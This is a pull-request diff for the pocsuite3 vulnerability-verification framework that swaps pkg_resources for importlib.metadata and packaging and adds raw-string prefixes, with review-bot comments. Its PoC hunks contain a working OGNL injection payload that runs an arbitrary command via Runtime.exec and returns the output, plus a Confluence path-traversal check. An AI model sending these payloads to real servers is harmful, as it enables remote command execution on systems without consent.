replace pkg_resources for python 3.12 #420

Merged
merged 4 commits into from
Apr 29, 2024
Merged
2 changes: 1 addition & 1 deletion README.md
Expand Up @@ -148,7 +148,7 @@ The usage is roughly the same as docker’s command line parameters.

## Requirements

- Python 3.7+
- Python 3.8+
- Works on Linux, Windows, Mac OSX, BSD, etc.

## Installation
4 changes: 2 additions & 2 deletions pocsuite3/lib/core/register.py
@@ -1,5 +1,5 @@
import re
import pkg_resources
from importlib import metadata
import importlib.machinery
import importlib.util
from importlib.abc import Loader
Expand Down Expand Up @@ -56,7 +56,7 @@ def check_requires(data):
import_name = install_name
__import__(import_name)
try:
ver = pkg_resources.get_distribution(install_name).version
ver = metadata.version(install_name)
except Exception:
ver = 'unknown'
logger.info(f'{install_name}=={ver} has been installed')
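Review bot: The `except Exception:` that wraps the new `metadata.version(install_name)` call is broader than the lookup needs. A distribution that is not installed raises `metadata.PackageNotFoundError`, so `except metadata.PackageNotFoundError:` keeps the `'unknown'` fallback without hiding unrelated failures; if other errors are expected here (for example an empty name), list them explicitly. The logged `name==version` line is the only visible record of which dependency version a PoC's requirement resolved to, so a comment such as `# version is informational; a failed lookup must not fail the requirement check` above the `try` would document why the fallback exists. `check_requires` starts and ends outside this hunk.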
4 changes: 2 additions & 2 deletions pocsuite3/lib/core/settings.py
Expand Up @@ -39,7 +39,7 @@
"Usage of pocsuite for attacking targets without prior mutual consent is illegal."
)

BANNER = """\033[01;33m
BANNER = r"""\033[01;33m
,------. ,--. ,--. ,----. \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
| .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. |
| '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' <
Expand All @@ -57,7 +57,7 @@
BOLD_PATTERNS = (
"' is vulnerable",
"success",
"\d ",
r"\d ",
)

OLD_VERSION_CHARACTER = ("from comm import cmdline", "from comm import generic")
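Review bot: The `r` prefix added to `BANNER` also disables the `\033` escapes visible on the first two lines of the literal, so the string now holds a backslash followed by `033` instead of the ESC byte. Unless the banner is decoded again somewhere outside this hunk, it would be printed with literal `\033[01;33m` text rather than colours. The prefix was presumably added to silence invalid-escape warnings from backslashes in the ASCII art further down; keeping the opening as `BANNER = """\033[01;33m` (no `r`) and writing each art backslash as `\\` preserves the original value. The `r"\d "` change in `BOLD_PATTERNS` is value-preserving. The `BANNER` literal continues past the end of the first hunk.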
4 changes: 2 additions & 2 deletions pocsuite3/lib/core/update.py
@@ -1,6 +1,6 @@
from pocsuite3.lib.core.data import logger, conf
from six.moves.xmlrpc_client import ServerProxy
from pkg_resources import parse_version
from xmlrpc.client import ServerProxy
from packaging.version import parse as parse_version
from pocsuite3 import __version__


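Review bot: `packaging.version.parse`, imported here as `parse_version`, can be stricter than the `pkg_resources` helper it replaces: recent packaging releases raise `InvalidVersion` for a string that is not a valid PEP 440 version instead of returning a legacy version object. The same import swap appears in `minimum_version_required` in `pocsuite3/lib/utils/__init__.py`, where `parse_version(ver)` is called with no handler in the visible lines, and in the later import hunk next to `safe_eval`. Those strings appear to come from a remote index or from third-party PoC and template files, so each call site should catch `packaging.version.InvalidVersion` and treat the value as unusable, e.g. `except InvalidVersion: logger.warning(f'invalid version string: {ver!r}')`. The call sites in update.py are outside this hunk, so this needs confirming there.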
2 changes: 1 addition & 1 deletion pocsuite3/lib/utils/__init__.py
Expand Up @@ -283,7 +283,7 @@ def gen_cert(countryName='',

def minimum_version_required(ver):
from pocsuite3 import __version__
from pkg_resources import parse_version
from packaging.version import parse as parse_version
v1, v2 = parse_version(ver), parse_version(__version__)
if v1 > v2:
logger.warning(f'The minimum version required for this PoC plugin is {ver}, '
Expand Up @@ -16,7 +16,7 @@
from typing import get_type_hints, Union

import chardet
from pkg_resources import parse_version
from packaging.version import parse as parse_version
from pocsuite3.lib.core.log import LOGGER as logger
from pocsuite3.lib.yaml.nuclei.protocols.common.expressions.safe_eval import safe_eval

6 changes: 3 additions & 3 deletions pocsuite3/modules/spider/__init__.py
Expand Up @@ -73,9 +73,9 @@ def get_links(self, url, url_ext=()):
def get_redirect_url(url):
# TODO:
# regex need more test cases
meta_regex = '(?is)\<meta[^<>]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*'
body_regex = '''(?is)\<body[^<>]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*'''
js_regex = '''(?is)<script.*?>[^<>]*?location\.(?:replace|href|assign)[=\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?</script>'''
meta_regex = r'(?is)\<meta[^<>]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*'
body_regex = r'''(?is)\<body[^<>]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*'''
js_regex = r'''(?is)<script.*?>[^<>]*?location\.(?:replace|href|assign)[=\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?</script>'''

resp = requests.get(url)
true_url = resp.url
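Review bot: With the `r` prefix, the `\\\\` inside the character class of all three patterns is now four backslash characters (two escaped backslashes) rather than the two the old literals produced. The class matches the same set either way, so behaviour is unchanged, but in a raw string `\\` is enough and the leading `\<` needs no escape, e.g. `meta_regex = r'(?is)<meta[^<>]*?url\s*=([\d\w://\\.?=&;%-]*)[^<>]*'`. The existing TODO already asks for more test cases; a few fixed HTML snippets asserted against each pattern would confirm the conversion changed nothing. `get_redirect_url` continues outside the hunk.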
2 changes: 1 addition & 1 deletion pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py
Expand Up @@ -36,7 +36,7 @@ def _verify(self):
r = requests.post(paylaod, data=data, headers=headers)

if r.status_code == 200 and "</web-app>" in r.text:
m = re.search('<web-app[\s\S]+<\/web-app>', r.text)
m = re.search(r'<web-app[\s\S]+<\/web-app>', r.text)
if m:
content = m.group()[:limitSize]
result['FileInfo'] = {}
Expand Up @@ -31,7 +31,7 @@ def _options(self):

def _check(self):
result = {}
exec_payload = "(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\[email protected]@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\[email protected]@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"
exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\[email protected]@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\[email protected]@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))" # noqa: E501
paylaod = exec_payload.format(cmd=quote("id"))
r = requests.get(self.url + "?" + paylaod)
if "groups=" in r.text:
Expand All @@ -52,7 +52,7 @@ def _attack(self):
result = {}
if p:
cmd = self.get_option("command")
exec_payload = "(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\[email protected]@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\[email protected]@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"
exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\[email protected]@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\[email protected]@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))" # noqa: E501
payload = exec_payload.format(cmd=quote(cmd))
r = requests.get(self.url + "?" + payload)
if r.text:
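Review bot: Adding the `r` prefix to `exec_payload` in `_check`, and again in `_attack`, changes the string's value: in the old literal each `\\` was one backslash, in the raw literal it is two, so the query string is no longer the one the previous revision sent. If the server-side parsing depends on the single-backslash form, `_check` will stop seeing `groups=` in the response and report an affected host as not vulnerable, which is a false negative for anyone using this check to verify patch status. To silence the invalid-escape warning without altering the value, keep the literal non-raw and double only the lone backslash before each `%27`, or keep `r` and halve every `\\`. A one-line assertion comparing the new literal with the old one would catch this kind of drift. Both methods start outside their hunks.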
5 changes: 3 additions & 2 deletions setup.py
Expand Up @@ -34,7 +34,7 @@ def find_packages(where='.'):
zip_safe=False,
packages=find_packages(),
include_package_data=True,
python_requires='>=3.6',
python_requires='>=3.8',
entry_points={
"console_scripts": [
"pocsuite = pocsuite3.cli:main",
Expand All @@ -57,7 +57,8 @@ def find_packages(where='.'):
"dacite",
"PyYAML",
"lxml",
"docker"
"docker",
"packaging"
],
extras_require={
'complete': [